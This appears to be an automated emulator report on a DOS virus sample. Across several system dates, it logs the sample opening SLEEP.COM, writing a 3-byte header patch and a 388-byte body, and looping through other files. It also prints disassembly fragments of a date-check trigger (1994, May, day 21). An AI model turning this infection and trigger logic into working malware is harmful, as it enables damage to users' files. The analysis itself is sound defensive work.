{"DateBased":true,"Day":21,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":735,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:41:48.26746625Z 26 PC: 12bae | Set disk transfer address
2018-12-25T11:41:48.269121865Z 78 PC: 12ac9 | Find first file
2018-12-25T11:41:48.279432952Z 61 PC: 12ad4 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:41:48.285712198Z 63 PC: 12ae0 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:41:48.292295048Z 66 PC: 12bb6 | Move file pointer
2018-12-25T11:41:48.293687692Z 64 PC: 12b0f | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:41:48.296260676Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:48.298209961Z 64 PC: 12b1f | Write file or device (Write 388 bytes on handle 5)
2018-12-25T11:41:50.003342929Z 62 PC: 12b23 | Close file
2018-12-25T11:41:50.062025394Z 42 PC: 12b31 | Get date 0x12b31: cmp cx, 0x7ca
0x12b35: jge 0x12b3b
0x12b37: mov ah, 0x4f
0x12b39: jmp 0x12ac7
0x12b3b: mov ah, 0x2a
0x12b3d: int 0x21
0x12b3f: cmp dh, 5
0x12b42: jge 0x12b49
0x12b44: mov ah, 0x4f
0x12b46: jmp 0x12ac7
0x12b49: mov ah, 0x2a
0x12b4b: int 0x21
0x12b4d: cmp dl, 0x15
0x12b50: jge 0x12b57
0x12b52: mov ah, 0x4f
0x12b54: jmp 0x12ac7
0x12b57: add al, byte ptr [bx + si]
0x12b59: mov al, byte ptr cs:[0x217]
0x12b5d: call 0x12b77
0x12b60: cmp byte ptr cs:[0x217], 0x9a
2018-12-25T11:41:50.064787893Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:50.066904307Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:50.071126704Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:50.075181357Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:50.083079839Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:50.09071439Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:50.092009541Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:50.094898993Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:50.151845005Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:50.154035274Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:50.15695135Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:50.163381Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:50.169772306Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:50.171663535Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:50.174157125Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:50.175390477Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:50.182557676Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:50.226675495Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:50.228816822Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:50.232243775Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:50.239110848Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:50.245265656Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:50.247209581Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:50.249729591Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:50.250949503Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:50.253511867Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:50.310343301Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:50.312344965Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:50.323216533Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:50.329660383Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:50.335659042Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:50.336803364Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:50.339576204Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:50.340777542Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:50.343353944Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:50.399242233Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:50.401205889Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:50.404272406Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:50.410681746Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:50.416639496Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:50.417831533Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:50.420700747Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:50.421890857Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:50.494351264Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:50.565569036Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:50.567031714Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:50.568751782Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:50.573729717Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:50.577618442Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:50.578525463Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:50.580736625Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:50.581719234Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:50.583509991Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:50.648626438Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:50.650921669Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:50.653575856Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:50.660919033Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:50.663404483Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:50.66501436Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:50.667437977Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:50.669763989Z 26 PC: 12bae | Set disk transfer address (See above)
2018-12-25T11:41:50.670784267Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":735,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:41:48.603825491Z 26 PC: 12bae | Set disk transfer address
2018-12-25T11:41:48.60519351Z 78 PC: 12ac9 | Find first file
2018-12-25T11:41:48.610865737Z 61 PC: 12ad4 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:41:48.616963282Z 63 PC: 12ae0 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:41:48.623214708Z 66 PC: 12bb6 | Move file pointer
2018-12-25T11:41:48.624401328Z 64 PC: 12b0f | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:41:48.626777387Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:48.628178404Z 64 PC: 12b1f | Write file or device (Write 388 bytes on handle 5)
2018-12-25T11:41:50.003165066Z 62 PC: 12b23 | Close file
2018-12-25T11:41:50.062013841Z 42 PC: 12b31 | Get date 0x12b31: cmp cx, 0x7ca
0x12b35: jge 0x12b3b
0x12b37: mov ah, 0x4f
0x12b39: jmp 0x12ac7
0x12b3b: mov ah, 0x2a
0x12b3d: int 0x21
0x12b3f: cmp dh, 5
0x12b42: jge 0x12b49
0x12b44: mov ah, 0x4f
0x12b46: jmp 0x12ac7
0x12b49: mov ah, 0x2a
0x12b4b: int 0x21
0x12b4d: cmp dl, 0x15
0x12b50: jge 0x12b57
0x12b52: mov ah, 0x4f
0x12b54: jmp 0x12ac7
0x12b57: add al, byte ptr [bx + si]
0x12b59: mov al, byte ptr cs:[0x217]
0x12b5d: call 0x12b77
0x12b60: cmp byte ptr cs:[0x217], 0x9a
2018-12-25T11:41:50.064783077Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:50.068599281Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:50.07525512Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:50.081490478Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:50.083300672Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:50.085927594Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:50.087562094Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:50.090856904Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:50.130974849Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:50.132955204Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:50.135870211Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:50.139888063Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:50.143767668Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:50.14547924Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:50.148090058Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:50.149452935Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:50.152465718Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:50.20163617Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:50.203660392Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:50.206831037Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:50.212957002Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:50.218922126Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:50.224144329Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:50.226698265Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:50.227967532Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:50.23129582Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:50.290570973Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:50.29256917Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:50.294208159Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:50.298436326Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:50.302409636Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:50.303302591Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:50.305334484Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:50.306312088Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:50.307992172Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:50.349089063Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:50.351221353Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:50.353738655Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:50.36050556Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:50.366495453Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:50.367672096Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:50.371005176Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:50.3722399Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:50.429393311Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:50.49530578Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:50.497271197Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:50.499645055Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:50.506483657Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:50.51244709Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:50.5135882Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:50.5165034Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:50.518081781Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:50.520474511Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:50.59689591Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:50.598430241Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:50.600890864Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:50.607677115Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:50.610112035Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:50.611766303Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:50.61418314Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:50.616622391Z 26 PC: 12bae | Set disk transfer address (See above)
2018-12-25T11:41:50.617839371Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1994,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":735,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:41:48.924586208Z 26 PC: 12bae | Set disk transfer address
2018-12-25T11:41:48.926922877Z 78 PC: 12ac9 | Find first file
2018-12-25T11:41:48.939620841Z 61 PC: 12ad4 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:41:48.947385145Z 63 PC: 12ae0 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:41:48.955842337Z 66 PC: 12bb6 | Move file pointer
2018-12-25T11:41:48.959111384Z 64 PC: 12b0f | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:41:48.962577796Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:48.964725929Z 64 PC: 12b1f | Write file or device (Write 388 bytes on handle 5)
2018-12-25T11:41:48.986994332Z 62 PC: 12b23 | Close file
2018-12-25T11:41:48.997189232Z 42 PC: 12b31 | Get date 0x12b31: cmp cx, 0x7ca
0x12b35: jge 0x12b3b
0x12b37: mov ah, 0x4f
0x12b39: jmp 0x12ac7
0x12b3b: mov ah, 0x2a
0x12b3d: int 0x21
0x12b3f: cmp dh, 5
0x12b42: jge 0x12b49
0x12b44: mov ah, 0x4f
0x12b46: jmp 0x12ac7
0x12b49: mov ah, 0x2a
0x12b4b: int 0x21
0x12b4d: cmp dl, 0x15
0x12b50: jge 0x12b57
0x12b52: mov ah, 0x4f
0x12b54: jmp 0x12ac7
0x12b57: add al, byte ptr [bx + si]
0x12b59: mov al, byte ptr cs:[0x217]
0x12b5d: call 0x12b77
0x12b60: cmp byte ptr cs:[0x217], 0x9a
2018-12-25T11:41:49.000163796Z 42 PC: 12b3f | Get date 0x12b3f: cmp dh, 5
0x12b42: jge 0x12b49
0x12b44: mov ah, 0x4f
0x12b46: jmp 0x12ac7
0x12b49: mov ah, 0x2a
0x12b4b: int 0x21
0x12b4d: cmp dl, 0x15
0x12b50: jge 0x12b57
0x12b52: mov ah, 0x4f
0x12b54: jmp 0x12ac7
0x12b57: add al, byte ptr [bx + si]
0x12b59: mov al, byte ptr cs:[0x217]
0x12b5d: call 0x12b77
0x12b60: cmp byte ptr cs:[0x217], 0x9a
0x12b66: mov ah, 0x4f
0x12b68: je 0x12b25
0x12b6a: inc byte ptr cs:[0x217]
0x12b6f: mov byte ptr cs:[0x216], 0
0x12b75: loop 0x12b59
0x12b77: mov ah, 5
2018-12-25T11:41:49.003660566Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:49.006640536Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:49.013870139Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:49.021867696Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.023800859Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:49.027092287Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.029221967Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:49.033301582Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:49.042598869Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:49.045475842Z 42 PC: 12b3f | Get date (See above)
2018-12-25T11:41:49.049287567Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:49.061113395Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:49.068736574Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:49.076568239Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.078447673Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:49.081752937Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.084412877Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:49.08854637Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:49.097207674Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:49.102502634Z 42 PC: 12b3f | Get date (See above)
2018-12-25T11:41:49.105216674Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:49.108502893Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:49.116960368Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:49.125435013Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.129929647Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:49.141048465Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.144257387Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:49.154186927Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:49.164880731Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:49.167813646Z 42 PC: 12b3f | Get date (See above)
2018-12-25T11:41:49.170514689Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:49.173737376Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:49.181938193Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:49.190132669Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.192038161Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:49.196276657Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.198244793Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:49.20164873Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:49.212064232Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:49.214795615Z 42 PC: 12b3f | Get date (See above)
2018-12-25T11:41:49.217292742Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:49.221083211Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:49.229940992Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:49.237543318Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.239714054Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:49.243828449Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.245751137Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:49.25516518Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:49.265294988Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:49.267989471Z 42 PC: 12b3f | Get date (See above)
2018-12-25T11:41:49.27118891Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:49.275239032Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:49.282839735Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:49.291166517Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.293843035Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:49.297469873Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.299417097Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:49.303465617Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:49.312716346Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:49.315501415Z 42 PC: 12b3f | Get date (See above)
2018-12-25T11:41:49.318292447Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:49.322571086Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:49.330116838Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:49.333338402Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:49.336202482Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:49.338801404Z 42 PC: 12b3f | Get date (See above)
2018-12-25T11:41:49.341539238Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:49.345136135Z 26 PC: 12bae | Set disk transfer address (See above)
2018-12-25T11:41:49.346767721Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":735,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:41:48.989888852Z 26 PC: 12bae | Set disk transfer address
2018-12-25T11:41:48.99169729Z 78 PC: 12ac9 | Find first file
2018-12-25T11:41:48.9988669Z 61 PC: 12ad4 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:41:49.00732483Z 63 PC: 12ae0 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:41:49.014803176Z 66 PC: 12bb6 | Move file pointer
2018-12-25T11:41:49.017909175Z 64 PC: 12b0f | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:41:49.021290317Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.023287494Z 64 PC: 12b1f | Write file or device (Write 388 bytes on handle 5)
2018-12-25T11:41:49.038374799Z 62 PC: 12b23 | Close file
2018-12-25T11:41:49.047516883Z 42 PC: 12b31 | Get date 0x12b31: cmp cx, 0x7ca
0x12b35: jge 0x12b3b
0x12b37: mov ah, 0x4f
0x12b39: jmp 0x12ac7
0x12b3b: mov ah, 0x2a
0x12b3d: int 0x21
0x12b3f: cmp dh, 5
0x12b42: jge 0x12b49
0x12b44: mov ah, 0x4f
0x12b46: jmp 0x12ac7
0x12b49: mov ah, 0x2a
0x12b4b: int 0x21
0x12b4d: cmp dl, 0x15
0x12b50: jge 0x12b57
0x12b52: mov ah, 0x4f
0x12b54: jmp 0x12ac7
0x12b57: add al, byte ptr [bx + si]
0x12b59: mov al, byte ptr cs:[0x217]
0x12b5d: call 0x12b77
0x12b60: cmp byte ptr cs:[0x217], 0x9a
2018-12-25T11:41:49.050005103Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:49.053665666Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:49.061228003Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:49.068434258Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.070936532Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:49.073955291Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.075530368Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:49.080285036Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:49.089518964Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:49.092275239Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:49.095738298Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:49.111276375Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:49.118565922Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.12017306Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:49.123901655Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.125555239Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:49.12857645Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:49.141316661Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:49.143665779Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:49.146549571Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:49.155878238Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:49.164286641Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.166453087Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:49.170653591Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.172480968Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:49.175637131Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:49.185217686Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:49.188001637Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:49.191459194Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:49.200136357Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:49.207590308Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.209489414Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:49.213515384Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.215398636Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:49.219293142Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:49.227998721Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:49.231252199Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:49.234320103Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:49.241785695Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:49.249602971Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.251286488Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:49.254383786Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.257258022Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:49.267458954Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:49.27777988Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:49.281822208Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:49.285346243Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:49.293796835Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:49.303147428Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.304823274Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:49.307867391Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.310292261Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:49.313775152Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:49.32308263Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:49.32602972Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:49.329860894Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:49.337634407Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:49.341025481Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:49.344323045Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:49.347067485Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:49.350137904Z 26 PC: 12bae | Set disk transfer address (See above)
2018-12-25T11:41:49.3524984Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":true,"Day":1,"Month":5,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":735,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:41:49.488446626Z 26 PC: 12bae | Set disk transfer address
2018-12-25T11:41:49.490413091Z 78 PC: 12ac9 | Find first file
2018-12-25T11:41:49.49729835Z 61 PC: 12ad4 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:41:49.504741156Z 63 PC: 12ae0 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:41:49.520725152Z 66 PC: 12bb6 | Move file pointer
2018-12-25T11:41:49.526383736Z 64 PC: 12b0f | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:41:49.52959601Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.54567146Z 64 PC: 12b1f | Write file or device (Write 388 bytes on handle 5)
2018-12-25T11:41:49.562425812Z 62 PC: 12b23 | Close file
2018-12-25T11:41:49.572797046Z 42 PC: 12b31 | Get date 0x12b31: cmp cx, 0x7ca
0x12b35: jge 0x12b3b
0x12b37: mov ah, 0x4f
0x12b39: jmp 0x12ac7
0x12b3b: mov ah, 0x2a
0x12b3d: int 0x21
0x12b3f: cmp dh, 5
0x12b42: jge 0x12b49
0x12b44: mov ah, 0x4f
0x12b46: jmp 0x12ac7
0x12b49: mov ah, 0x2a
0x12b4b: int 0x21
0x12b4d: cmp dl, 0x15
0x12b50: jge 0x12b57
0x12b52: mov ah, 0x4f
0x12b54: jmp 0x12ac7
0x12b57: add al, byte ptr [bx + si]
